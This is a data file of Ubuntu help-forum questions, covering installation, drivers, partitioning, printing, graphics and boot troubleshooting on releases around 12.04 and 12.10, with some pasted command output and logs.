223165	how can i install nachos ?	i 'm trying to install nachos on 12.10 . all methods i 've tried failed -- i tried various ways , but unfortunately none of them worked . i need to run the nachos system to understand the nature of operating systems . can any person help me to solve this installation problem ?
223173	wireless very weak and slow on ubuntu macbook pro 8.3 ?	the question says it all . i have ubuntu running on a macbook pro 8.3 . it connects but the signal is very weak . when i boot using the mac , the wireless is very fast and reliable . the relevant output nm-tool is type : 802.11 wifi driver : b43 state : connected default : yes hw address : 28 : cf : da : d4:3b : c4 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points wifi-nu : infra , 00:24:6c:81:14:00 , freq 2412 mhz , rate 54 mb/s , strength 40 wpa2 enterprise milk digital admin : infra , 0c:85:25:68 : bb : d3 , freq 2437 mhz , rate 54 mb/s , strength 29 wpa wpa2 legs admin : infra , 0c:85:25:68 : bb : d5 , freq 2437 mhz , rate 54 mb/s , strength 32 wpa wpa2 it keeps droping and is significantly slower . also , i installed the driver as recommended by the ubuntu macbook support please help
223177	how much space i should use for ubuntu ? which partitions ?	i have a few questions regarding installation . i have a 500g hd on my laptop . i dont intend on dual-booting on this thing . i intend you use it for development . i decided to get back into programming after a decade , java , android apps , basically open source stuff . all i intend to have on this laptop is ubuntu , eclipse and whatever else imay need for development . i would like to have some space on my disk that can be access from my windows7 box . there will more than likely be mp3 's , video and pdf/ebooks on it . so , i guess what i need to know is how much space i should use for ubuntu . which partitions should i create . should i let ubuntu only create the default 2 , or should i customize the install using the info in the `` the directory tree '' section in the ubuntu install/partitioning guide any advice would be greatly appreciated thanks , mike
223179	how to remove medibuntu repository and packages ?	i followed directions to add medibuntu but it has messed up some codecs and dependencies so i can no longer watch videos i have run this command , originated by a forum post : sean @ sean-p55-usb3 : ~ $ sudo -e wget -- output-document=/etc/apt/sources.list.d/medibuntu.list http : //www.medibuntu.org/sources.list.d/ $ ( lsb_release -cs ) .list & & sudo apt-get -- quiet update & & sudo apt-get -- yes -- quiet -- allow-unauthenticated install medibuntu-keyring & & sudo apt-get -- quiet update how do i reverse this ?
223184	hp spectre xt screen dim ( completely dark ) on boot . can this be fixed ?	when my computer boots up , the lcd backlight is completely blank . i have to increase the brightness using the keys on my keyboard , and only then am i able to see the login screen . i 'm not sure how the 'fn ' keys work on the hp spectre xt ultrabook , however , it seems to be enabled by default . that is , i do n't have to hold down the 'fn ' key when trying to decrease ( f2 ) or increase ( f3 ) the screen 's brightness . in an earlier issue with ubuntu 12.10 on my machine , i needed to modify a line in my grub menu from : grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' acpi=off '' to , grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' it 's after making this change that the blank screen on booting up became an issue . further , i have read the following entry on the ubuntu wiki around the backlight and if i 'm recognizing the problem as : hotkeys change the brightness , but no osd feedback and the brightness applet does not work . then , it says the following : there is nothing that the kernel can do to resolve this situation . since there is no vendor specific control mechanism and the generic acpi interface is not defined ( or not defined correctly ) , there is no way linux can interact . in those cases the hotkeys are directly wired to the backlight control and no events are passed on to the os . what can i do , to not have to manually increase the brightness each time my computer boots up ?
223185	system shutdown stopped working	since last week shutdown has stopped working in my system . either i use the shutdown menu in unity/lightdm or use sudo shutdown -h now the system just locks , and i ca n't either use alt+reisub . only a hard shutdown works . if i shutdown from a tty , this is the last output i get before the system freezes : umount : /run/lock : not munted umount : /run/shm : not mounted mount : / is busy * will now halt [ ... ] power down . after this the disk usage led turns on and i ca n't do anything else . what could be the problem ? what i have tried set acpi=force in grub does n't help ; check for errors in the shutdown process : i get any error at all during shutdown , except the lines stated on top ; acpid is installed . reboot/suspend works just fine ! edit as seen here i get some warnings regarding acpi in /var/log/boot.log .
223186	how to reinstall purchased software after os reinstallation ?	a month or so ago i purchased bastion on the ubuntu software center . i noticed it was running really slowly , so i tried to get the driver for my graphics card . in doing so i completely messed up the resolution on my screen , and could n't get it back . i backed up my files using the stock ubuntu software and did a fresh install , and restored my files . unfortunately bastion was not restored . is there any way i can get it back , or will i have to buy it again ?
223190	atheros ar5bmd22 wifi drivers	i have > 120mb bb connection , via wifi on windows i get around 90+mb connection . i have an asus rt-n66u dark night router , like i said on all other devices i have no issue . but using ubuntu 12.10 on my ultrabook i 'm lucky if i get +10mb and the connection is very temperamental . even simple actions like updating take an age to do via wifi . any advice would be greatly appreciated .
223192	samsung ml-2160 printer install	i need help a brand new samsung ml-2160 printer installation on ubuntu 12.04 the printer did not print all though it was recognized by my system and was labeled as `` installed '' . using different drivers ( picked from list of drivers ) did n't help . i did n't know how to install the driver downloaded from samsung but did it later very easily using sudo ./install.sh in download destination folder .
223194	setup of two additional ssd drives in raid 1	i have an ubuntu 12.04 setup with two hdd that is setup in a software raid 1 . now i need to add two additional ssd drives for separate storage of some database files . they need to be setup in their own separate raid 1 array . unfortunately i have no idea where and how to start ? so from the beginning after having plugged the two drives in , and booted the server - then what ?
223200	how do i change the formatting of xubuntu desktop icon text ?	xubuntu 12.10 , icon text is in bold . i want it regular and not bold . where can i change this ? i ca n't see desktop font options in any settings .
223212	no wireless connectivity on dell inspiron 1520	i have just installed ubuntu on a dell inspiron 1520 that came pre installed with windows vista and i currently run both of the os ( i just choose when the computer starts up ) . the wifi definitely works on the computer since i used it to download ubuntu in the first place when i was using vista . the network manager says that i only have a 'wired ' network and it does n't have any other options to choose from . i connected the laptop into a wired connection and downloaded the wicd network manager but it had no effect either . from there i continued to go into software sources and installed the wireless drive but that had no effect either . so ... what can i do ?
223213	confusion installing mongodb manually because of sitting behind a proxy	i am forced to install mongodb manually on an ubuntu server because the machine sits behind a proxy and there is no way to temporary open port 11371 for key exchange to happen . i am following this official mongodb tutorial . so i downloaded the tgz and extracted it in /usr/local/bin/mongodb . where i got confused is when assigning the ownership of the /data/db to the user mongo . so who creates the user mongo ? how to get control-scripts working ?
223215	how can i convert a .png file to .icns	what is the correct way of converting one or more .png files to .icns files ? . i 've installed icnsutils but i 'm having a hard time figuring out how to work with png2icns .
223217	how can i monitor/check outgoing dns lookup connections ?	when using the various cli network monitors like lsof , netstat , iftop . i 'd like to see what applications are doing dns lookups ( using port 53 over udp ) . how do i configure so that these connections are shown in the terminal ? i 'd like to see what ip address is being connected to and what applications are requesting the dns lookup . i 'm interested in any way to learn this information .
223221	how to troubleshoot and collect bug information for bluetooth mouse lag on high cpu load ?	i have just migrate to 12.10 and i have noticed that i have huge problem with my bluetooth mouse left click button on a high load ( wired , but scroll and right button are not affected ) . i think powersave cpu mode affect that more than cpu load . it just not `` trigger the interrupt '' . mouse is laggy , click are not registered . i can not work like that . at the same time , my touchpad and usb mouse works great . how do i check the - limit cpu frequency ( i use powersave and ondemend mode ) ? i now wonder , what should i log , check , measure , to capture enough data to fill bug report . any suggestions ?
223222	12.04 - make workspaces use the expose feature of compiz	i 'm running ubuntu 12.04 and i just wanted to know if there 's a possible way to use the `` expose '' feature found in compizconfig settings manager as the `` workspaces '' icon in the unity launcher ? i know this feature is great but using workspaces lags a lot for me , however using super+s to show up expose works smoothly without lag , is there anyway to use it instead of workspaces and use expose in replace of it ?
223225	how to fix slow graphics printing on 12.10 ? text printing speed is ok	ubuntu 12.10 32-bit dual boot with windows 7 . custom pc , nvidia onboard graphics . motherboard : ecs elitegroup gf8200a black series . `` hp laserjet 3015 '' multifunction printer . graphics printing fine with 12.04 but very slow on 12.10 . per an article i ran : ~ $ sudo apt-get install mesa-utils ~ $ glxinfo | grep renderer output : opengl renderer string : geforce 8200/integrated/sse2/3dnow ! do i need to get a graphics card to fix or will software tweaks solve this ?
223227	ubuntu 12.04 tilts when trying to open large excel file with libreoffice or matlab	i have an xlsx-file of size 27.3mb and when i try to open it either in libreoffice or matlab the whole system slows down my processor is amd sempron ( tm ) 140 processor ( should be about 2.7ghz ) memory i have about 1.7gb any ideas ? i opened this file in windows no problem ... of course it took a few seconds to load but ubuntu freezes with this file completely ... smaller files of size 3mb , 5mb etc open just fine ... thnx for support = )
223228	how do i run a game with a .x86 extension	can anyone help me run the game cs portable , i used to play this all the time on windows ? ? it 's free and the download link is here , the download link is in the bottom of his profile description . the file extension is .x86 and the game is only 45mb , so it wo n't take long too download .
223229	c # on ubuntu 12.04	is c # a good choice for ubuntu programming ? e.g unity , or applications that will run on ubuntu ? am i doing good wanting to learn c # when i 'm determined to stick with ubuntu and develop on it or for it ? if not , can you give me reasons why ? and which languages would be better than c # for ubuntu development ? i already know c , c++ , java ( basics ) , php , mysql , python ( basics ) . i like to learn new stuff , but stuff that worth my time . does c # worth my time ? if c # worth my time , here 's what i have done and what i need : i installed all mono packages i could find on the ubuntu standard repositories . now i want a good tutorial to get me started . i 'm a complete noob with c # so a basic tutorial and how to compile run under ubuntu 12.04 would be great .
223231	what 's the difference between gnome remix and gnome shell ?	i 'm asking this because i had problems with gnome shell ( i.e . : the apps menu disappeared , gnome 3.6 version changed to gnome 2 , weird stuff ... )
223232	why the poor graphics from my intel vga over thunderbolt/displayport ?	i installed ubuntu 12.10 on my mac mini server 2012 ( 6,2 i think ) . i have a dell u2412m ( 1920x1200 @ 60hz ) connected via a thunderbolt-displayport cable . from the moment refit hands over to grub , the graphics look quite poor . gradients are rough or dithered ( including the boot splash , greeter screen and desktop background ) , window title bars look awful , and there a number of other ugly artefacts . the resolution itself , however , is fine . the kernel is 3.5.0-19-generic . lspci tells me i have : 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) i ca n't see any errors in xorg.0.log , but i do n't want to paste the whole file here . sudo lshw -c display gives : *-display description : vga compatible controller product : 3rd gen core processor graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:49 memory : a0000000-a03fffff memory:90000000-9fffffff ioport:2000 ( size=64 ) opengl info from glxinfo is : opengl vendor string : intel open source technology center opengl renderer string : mesa dri intel ( r ) ivybridge mobile opengl version string : 3.0 mesa 9.0.1 lsmod shows that the i915 driver is loaded . taking a screenshot does not demonstrate the problem ( it looks fine when it 's opened on another os ) . windows 7 and osx look just fine on the same monitor using the displayport input , and ubuntu looks fine using the hdmi output via a hdmi-dvi converter . so how do i get the colors to look right ?
223235	make bootable usb disk for dban ?	i am confused how to make it , found dban here . i have an empty usb -disk and dban.*.iso . how can i do it with ubuntu ? i followed the instructions here to create the bootable iso for the dban . i downloaded the iso here . then i did $ umount /dev/sdb1 $ sudo dd if=dban.iso of=/dev/sdb1 and booted my thinkpad and then booted from the usb : press the blue thinpad -button , choose usb and then wait but here my computer does not do anything . just black screen . something went wrong ? !
223236	how can i get the the windows installer ( wubi ) for ubuntu 11.04 ?	i 'm looking for the link to have access to windows installer for ubuntu 11.10 . my computer has trouble running ubuntu 12.04 so i want to install an older version .
223237	unable to correct problems , you have held broken packages	after upgrading from 10.04 to 12.04 i am trying to install different packages . for instance ia32-libs and skype ( 4.0 ) . when trying to install these , i am getting the 'unable to correct problems , you have held broken packages ' error message . output of commands : sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . after running this : sudo dpkg -- configure -a foo @ foo : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
223239	ubuntu on old ibm thinkpad 2628	i have an old ibm thinkpad 2628 from 1998 and i was thinking about putting ubuntu on it . obviously it ca n't handle unity , so what can i do to get ubuntu working on my computer with decent processing ( not extremely laggy ) ? will ubuntu work or should i use kubuntu or xubuntu ? thanks
223240	how can i install the old tweetdeck version on ubuntu 12.10 64bits ?	i 've tried to install adobe air 2.6 and then the old version of tweetdeck ( 0.38.2 ) but it 's not working to me . can anybody help me please ?
223241	not able to create live cd	i downloaded 12.04.1 on a windows 7 machine . i burnt a dvd from the iso image using windows disc image burner . i had 'verify disc ' on . the disc was created successfully with no errors . i was not able to use this disc for installing ubuntu on another windows 7 machine . i do not get the welcome screen on booting . i find that on the disc i burnt , i do not find bin , disc tree , programs directories and cdromupgrade , start . * , ubuntu* files . i found the boot directory and wubi executable file . i tried downloading several times with the same result . i had similar problem earlier with 11.04 . can you please let me where the problem is ?
223244	change printer sleep time	background : brother hl-2270dw printer configured with my xubuntu 12.10 over my home network . whenever it finishes printing something , the fan keeps running for about 2 hours before going to sleep . question : is there any way i can decrease this `` awake '' time , so that the fan stops running sooner ? for example , is there a configuration file i am able to edit ?
223246	why do i have no wifi on a macbook air 14,2 ?	just installed quantal on my mba . wireless worked fine until i ran the first software-update and now it cant find the wireless driver . wired works fine but i dont have root privileges on network and cant get software sources to open because of the security policy . ( i want to check if the broadcom driver is selected . ) has anyone else experienced this problem , and if so , any idea on how to fix it ?
223248	/boot low on disk space	i see the following error while trying run the command shown below . i read somewhere that my /boot partition is low on disk space . how can i increase the size of the /boot partition so i can install more software ? i have a 500gb hard disk , so there is enough space to play with . sudo apt-get install libdvdread4 gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.2.0-33-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.2.0-33-generic.postinst line 1010. dpkg : error processing linux-image-3.2.0-33-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-server : linux-image-server depends on linux-image-3.2.0-33-generic ; however : package linux-image-3.2.0-33-generic is not configured yet . dpkg : error processing linux-image-server ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-server : linux-server depends on linux-image-server ( = 3.2.0.33.36 ) ; however : package linux-image-server is not configured yet . dpkg : error processing linux-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-image-3.2.0-33-generic linux-image-server linux-server n : ignoring file 'michael-gruz-canon-precise.list.1 ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'michael-gruz-canon-precise.list.1 ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension listed below is the output of du filesystem 1k-blocks used available use % mounted on /dev/mapper/ubuntu-root 712660664 104095912 572363692 16 % / udev 3964792 4 3964788 1 % /dev tmpfs 1591012 1064 1589948 1 % /run none 5120 0 5120 0 % /run/lock none 3977528 684 3976844 1 % /run/shm /dev/sda1 233191 219821 929 100 % /boot
223250	how to tweak powertop to reduce power consumption ?	i am a completely new user to linux/ubuntu . i looked through tips on battery issues and powertop but failed to find clear tips on how to tweak powertop except for toggle tunable . could someone look through the log and advise me on what should be done to reduce power consumption ? my laptop is 1 year old ! i also found that powertop periodically switches my mouse of although i never allowed it in toggle tunable . power consumption summary 363,4 wakeups/second , 2,4 gpu ops/second , 0,0 vfs ops/sec , 10,0 gfx wakes/sec and 11,8 % cpu use power est . usage events/s category description 4.00 w 100,0 % device audio codec hwc0d3 : intel 1.75 w 4,1 % 110,3 process powertop 1.00 w 51,8 pkts/s device network interface : eth0 ( tg3 ) 871 mw 2,4 % 54,5 process /opt/google/chrome/chrome -- type=ppapi -- channel=2277.31.1727086613 -- lang=en-us 752 mw 2,7 % 46,4 process /opt/google/chrome/chrome -- type=renderer -- lang=en-us -- force-fieldtrials=asyncdns/disabled/conncountimpact/conn_count_6/connn 643 mw 0,3 % 41,7 timer hrtimer_wakeup 238 mw 0,4 % 15,5 process compiz 234 mw 0,1 % 15,2 interrupt [ 43 ] i915 183 mw 0,1 % 11,6 process syndaemon -i 2.0 -k -r -t 173 mw 0,1 % 11,3 interrupt [ 7 ] sched ( softirq ) device power report the battery reports a discharge rate of 18.1 w system baseline power is estimated at 1.00 w power est . usage device name 5.74 w 11,8 % cpu use 4.00 w 100,0 % audio codec hwc0d3 : intel 1.00 w 51,8 pkts/s network interface : eth0 ( tg3 ) 24.0 mw 2,4 ops/s gpu 0 mw 100,0 % display backlight 0 mw 100,0 % display backlight 0 mw 100,0 % usb device : usb-device-8087-0024 0 mw 100,0 % usb device : ehci host controller 0 mw 100,0 % usb device : logitech usb optical mouse ( logitech ) 0 mw 0,0 % usb device : usb-device-8087-0024 0 mw 0,0 % usb device : ehci host controller 0 mw 0,0 % usb device : 1.3m hd webcam ( suyin ) 0 mw 0,0 % audio codec hwc0d0 : realtek 100,0 % pci device : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 100,0 % pci device : intel corporation 6 series/c200 series chipset family pci express root port 1 100,0 % pci device : intel corporation 6 series/c200 series chipset family pci express root port 2 100,0 % pci device : atheros communications inc. ar9287 wireless network adapter ( pci-express ) 100,0 % pci device : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller 100,0 % pci device : broadcom corporation netlink bcm57785 gigabit ethernet pcie 100,0 % pci device : broadcom corporation netxtreme bcm57765 memory card reader 100,0 % pci device : intel corporation 6 series/c200 series chipset family high definition audio controller 100,0 % pci device : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 100,0 % pci device : intel corporation 6 series/c200 series chipset family mei controller # 1 100,0 % pci device : intel corporation 2nd generation core processor family integrated graphics controller 100,0 % pci device : intel corporation xeon e3-1200/2nd generation core processor family pci express root port 0,0 pkts/s network interface : wlan0 ( ath9k ) 0,0 % radio device : ath9k 0,0 % radio device : acer-wmi
223255	adding a grub2 background image and custom font	i am trying to use grub-customizer to add a custom background image and use the ubuntu condensed font . the preview looks fine : but when i actually boot up , i get a messed-up configuration . the text is messed-up , with `` unknown character '' symbols appearing for the box around the boot menu options ( because apparently only the default grub font has these special characters ? ) . however , the boot options are in the ubuntu font . there is only a black screen as the background . i 'm trying to use a 1366x768 ( same as my screen res ) .png as the background image . this should be compatible , right ? what can i do to get a background image working ? sorry for the wait :
223256	gwibber not working at all ?	brand new fresh install of ubuntu 12.10 , with all updates installed . i 've added my facebook account in ubuntu online accounts . it works fine in empathy , but neither gwibber nor the gwibber ssocial lens show anything . if i open gwibber , it 's just blank . if i manually click refresh it just sits there `` refreshing '' forever . i 've tried removing .config/gwibber and .cache/gwibber and trying again but same problems occur . what gives here ? is there anyway to make it work ?
223257	failed to restart after installation	i 'm trying to install a 64 bits ubuntu desktop 12.10 to my new asus g75vw from a dvd . everything worked slowly but fine until it finished , then the installation program prompted me to restart.i clicked restart button after which the computer freezes and finally i have to power it off . now i can only boot into windows 7 not grub . where did i go wrong and how do i fix it ?
223260	unable to see desktop in 12.10 after installing amd catalyst	i followed a tutorial to install the amd catalyst for my gpu . when ubuntu boots , all i can see is my desktop background . i can right click on it . is there something i can do to fix this ? oh and the screen stays at a 800x600 resolution . i used this tutorial on ubuntu forums since i have integrated nvidia graphics but i use an amd card : card : amd radeon hd 7750 gddr5 1gb . is there a way to fix this ?
223264	can not play netflix dvd on kubuntu	i am unable to play netflix dvds for some reason . here is the output of vlc -v vlc media player 2.0.3 twoflower ( revision 2.0.2-93-g77aa89e ) [ 0x908108 ] main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . venkat @ ubuntu : ~ $ vlc -v vlc media player 2.0.3 twoflower ( revision 2.0.2-93-g77aa89e ) [ 0xe25108 ] main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . libdvdnav : using dvdnav version 4.2.0 libdvdread : using libdvdcss version 1.2.12 for dvd access libdvdnav : dvd title : rome_s1d5 libdvdnav : dvd serial number : 34b6b42f libdvdnav : dvd title ( alternative ) : rome_s1d5 libdvdnav : unable to find map file '/home/venkat/.dvdnav/rome_s1d5.map' libdvdnav : dvd disk reports itself with region mask 0x00f60000 . regions : 1 4 [ 0x7fa924000b78 ] main input error : es_out_reset_pcr called libdvdread : attempting to retrieve all css keys libdvdread : this can take a _long_ time , please be patient libdvdread : get key for /video_ts/vts_01_0.vob at 0x0000014e libdvdread : error cracking css key for /video_ts/vts_01_0.vob ( 0x0000014e ) libdvdread : elapsed time 2 libdvdread : get key for /video_ts/vts_01_1.vob at 0x00000152 libdvdread : error cracking css key for /video_ts/vts_01_1.vob ( 0x00000152 ) ! ! libdvdread : elapsed time 1 libdvdread : get key for /video_ts/vts_02_0.vob at 0x00012c0b libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_02_1.vob at 0x00023818 libdvdread : error cracking css key for /video_ts/vts_02_1.vob ( 0x00023818 ) ! ! libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_03_0.vob at 0x002f8471 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_03_1.vob at 0x002f8475 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_04_0.vob at 0x002f9ad0 libdvdread : error cracking css key for /video_ts/vts_04_0.vob ( 0x002f9ad0 ) libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_04_1.vob at 0x002f9ad4 libdvdread : error cracking css key for /video_ts/vts_04_1.vob ( 0x002f9ad4 ) ! ! libdvdread : elapsed time 0 libdvdread : found 4 vts's libdvdread : elapsed time 3 [ 0x7fa924000b78 ] main input error : es_out_reset_pcr called [ 0x7fa90c0010c8 ] dvdnav demux warning : can not get next block ( error reading from dvd . ) [ 0x7fa924000b78 ] main input error : es_out_reset_pcr called [ 0x7fa924000b78 ] main input error : es_out_reset_pcr called [ 0x7fa90c0010c8 ] dvdnav demux warning : can not get next block ( error reading nav packet . ) as seen above i have libdvdcss and libdvdread4 installed . what am i missing .
223270	logitech unifying adapter with k520 keyboard and m310 mouse not working ?	everywhere that i have read online has said that as long as the devices are paired to the adapter first on a windows machine using the unifying software that it would work fine , so i have done that , and it works fine on windows . however on ubuntu nothing is making the adapter work . plugging in the adapter gives this output in dmesg : [ 2435.192014 ] usb 3-2 : > new full-speed usb device number 10 using xhci_hcd [ 2435.210390 ] usb 3-2 : > new usb device found , idvendor=046d , idproduct=c52b [ 2435.210395 ] usb 3-2 : > new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 2435.210399 ] usb 3-2 : > product : usb receiver [ 2435.210402 ] usb 3-2 : > manufacturer : logitech [ 2435.216076 ] logitech-djreceiver 0003:046d : c52b.001f : > hiddev0 , hidraw0 : usb hid v1.11 device [ logitech usb receiver ] on usb-0000:00:14.0-2/input2 [ 2435.216363 ] logitech-djreceiver 0003:046d : c52b.001f : logi_dj_probe : logi_dj_recv_query_paired_devices error : -32 [ 2435.216598 ] logitech-djreceiver : probe of 0003:046d : c52b.001f failed with error -32 i tried following this guide and in the end ran sudo /opt/unify/pairing_tool /dev/hidraw0 but the output is : unable to open device : no such file or directory ok , so i have found a `` fix '' basically , re plugging the adapter into a different usb port ( does n't always work , so i have to loop between my ports , sometimes ending up with it working on the original port ! ) . on the times when it fails it displays that same -32 error message in dmesg
223276	dual monitors w/ different workspaces ?	i have two monitors connected by vga , but both are showing the same workspace . i want to know how to fix this problem and get back to having separate workspaces on each monitor
223277	no sound after clean install	did a clean install of ubuntu 12.10 and everything working great except for the sound . ubuntu does n't even seem to be recognizing the fact my hp dv6000 has the capability of making sound ! i have the dummy output problem , and when i try to open alsamixer using terminal i get the message that no such file or directory exists . i ca n't get it to recognize any soundcards or audio devices at all . i 've been working on the problem for a couple days now and have even taken the laptop apart to ensure that all cables are properly attached ... when i go into the phoenixbios there are no sound options that i can find . the laptop does make a loud beep if i press buttons in the bios , but once it boots to the hard drive , the thing is mute . help !
223280	why the difference between samba sharing inside home folder and outside ( eg : mounted device )	with samba , when i share inside my home folder , i only need to right click the folder i want to share ( let 's assume it is on the desktop ) and select sharing options , then just select the options i want to share it as and that 's it , the user , be it in windows or linux will be able to see , copy , paste and basically have the correct access that i selected for the share without too much hassle . this is specially true if i allow the guest option when sharing . if samba is not installed , it will prompt me to install it and configure it in 2 or 3 clicks when i try to share a folder . after login out and in , i can share any folder inside my home and be done with it . the user from windows or ubuntu can see my pc and the sharing resources with no problems at all . there is no additional steps to configure permissions aside from the 2 or 3 samba share options when selecting the sharing options in the context menu . the problems arise when i try to share something outside of my home . for example , a mountable unit . doing it the same way i mentioned before does not work . the external user either can not access the shared resource or can not see it . i have checked to see the permissions and ownership of the mountable unit ( they are exactly the same as my home folder ) , but still samba does not share anything outside of home as easy as something inside of it . what is the difference then , between sharing something inside and outside of home assuming both resources have the same owner and permissions .
223283	how can i remove indicator-session with 12.10	i would like to get rid of the indicator-session in ubuntu 12.10 . there is nothing in dconf editor to remove this icon on the top right . does anyone have a clue ?
223285	ubuntu1 sync problem	so , i did a complete re-install of ubuntu 12.10 but synced all my documents and things i needed before i did so to ubuntu 1 . after re-installing i though to myself 'what if instead of giving me back all my documents , it deletes them all because the folders it 's syncing with are now empty ' . my question is , when i sign in on my new install , will all my folders and files sync back to where they were , or will they sync with my now empty home folder and all be deleted ?
223293	`` invalid system disk , replace the disk , and then press any key '' while trying to boot ubuntu	i recently purchased refurbished computers with no operating system . i downloaded ubuntu to a flash drive but got an error `` invalid system disk , replace the disk , and then press any key '' can ubuntu be installed without a current operating system ? ?
223295	kile missing `` settings '' dialog after update to kubuntu 12.10	after update to kubuntu 12.10 , i can no longer access configuration options in kile from settings- > configure kile ( or whatever the menu entry was for configuration ) . in fact , `` settings '' menu has only five entries : `` define current document as master document '' , `` system check '' , `` show side bar '' , `` show message bar '' , and `` toolbars shown . '' i did a fresh install of kubuntu 12.10 on one of my other computers , and same problem . i even tried adding the ( unsupported ) ppa : kile/stable , but the problem persists . any ideas ? i need to access settings to set pdf latex to use `` modern '' compilation mode , so that i can use synctex .
223296	how to get ubuntu netbook edition unity layout layout in 12.04	i saw this article and liked the layout of unity . i would like to have it on my precise 64bit . also i want to keep my current settings , switching back to them whenever i want to . how can i do that ?
223297	how can i sort packages by file size when searching the repositories ?	i 'm trying to look at some statistics on the size of packages in the ubuntu repositories , and i 'm hoping to sort my searches of packages in the repositories by file size . is there a command that will let me look at file sizes of packages in the repositories/cache , sort them by file size , etc ? `apt-cache stats ' does n't provide all the information i 'd like . i 'm interested in only the official repositories at the moment , and i 'm interested in sorting all packages in the repositories , not simply the ones i have installed .
223300	error on attempting to move and shrink an ubuntu partition using gparted	i like to add the unallocated space to the ntfs /dev/sda2 partition . however i get following error when i move /dev/sda3 to the right , so that unallocated space can be added to /dev/sda2 . i am dual booting . i 'm running xp on the ntfs partition dev/sda2 , and an ubuntu desktop on /dev/sda6 . any idea what is the issue here ? ==================================== gparted 0.12.1 -- enable-libparted-dmraid libparted 2.3 move /dev/sda3 to the right and shrink it from 78.82 gib to 53.99 gib 00:00:01 ( error ) calibrate /dev/sda3 00:00:00 ( success ) path : /dev/sda3 start : 59,410,430 end : 224,701,154 size : 165,290,725 ( 78.82 gib ) shrink partition from 78.82 gib to 53.99 gib 00:00:00 ( error ) old start : 59,410,430 old end : 224,701,154 old size : 165,290,725 ( 78.82 gib ) requested start : 111,472,640 requested end : 224,700,415 requested size : 113,227,776 ( 53.99 gib ) libparted messages ( info ) unable to satisfy all constraints on the partition . ========================================
223301	how to completely remove and reinstall ubuntu ?	i want to reinstall ubuntu , but i also want all information and settings to disappear . so everything looks like the first time i installed it . is it possible to do so via terminal ? or what are the steps i should follow ?
223305	backlit keyboard on toshiba satellite p755-s5184 does n't work in ubuntu 12.04	i have the keyboard backlight turned on in bios to timer setting ( 1 second ) . when laptop boots the backlight works , but once ubuntu begins to load the backlights turn off . there is a function key combo that is supposed to turn it on ( fn+z ) , hitting that brings up a notification balloon showing the backlit keyboard icon but it is grayed out . i tried using keytouch to try and get the backlight working but my laptop model is n't on the list . i 've read in forums that if you dual boot with windows 7 , that doing a complete power cycle ( or put to sleep/hibernate ) while in windows 7 and restart into ubuntu that the backlight will work . all information i 've seen point to this being an acpi issue . i 've seen scripts to toggle the backlight from within ubuntu , but i do n't know how to create/run scripts . i 'm new to ubuntu , and have been searching the web and ca n't seem to find any answers that will work for my particular situation . any information would be much appreciated . thanks !
223310	switch between windows 7 and ubuntu without rebooting ?	is this possible ? it 's kind of a pain that i would like to get past .
223311	battery icon constantly empty when discharging vaio vgn-fz210ce	i have a sony vaio vgn-210ce laptop , and its battery does not report the drain rate properly . in 11.10 and earlier , the battery icon would update with the percentage , not the estimated time . in 12.04 and 12.10 , it estimates by time , which is always some very low value because the estimated drain rate is 700w . i currently have 89 % in my battery but the icon is red and empty . if there is an application i should install , or a setting i should change , please let me know . thanks !
223313	ubuntu 12.10 working very slow	my computer is working very slow after installing ubuntu 12.10 final . before i used to have ubuntu 11.10 and it is working very fine for me , but after installing ubuntu 12.10 it makes me very angry , working very very slow . my computer configuration 1 ) pentium 4 3.4 ghz processor 2 ) 1gb ddr2 ram 3 ) 250gb hdd
223318	wireless does n't work	i have installed ubuntu 11.04 on my acer aspire 4349 with ar9485 wireless network adapter . the wired connection works fine , but i ca n't connect to wireless . the enable wireless tab is not listed on the network manager . please help me with this . thank you . i ran the following command . lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series chipset family pci express root port 1 ( rev b5 ) 00:1c.5 pci bridge : intel corporation 6 series chipset family pci express root port 6 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series chipset family 6 port sata ahci controller ( rev 05 ) 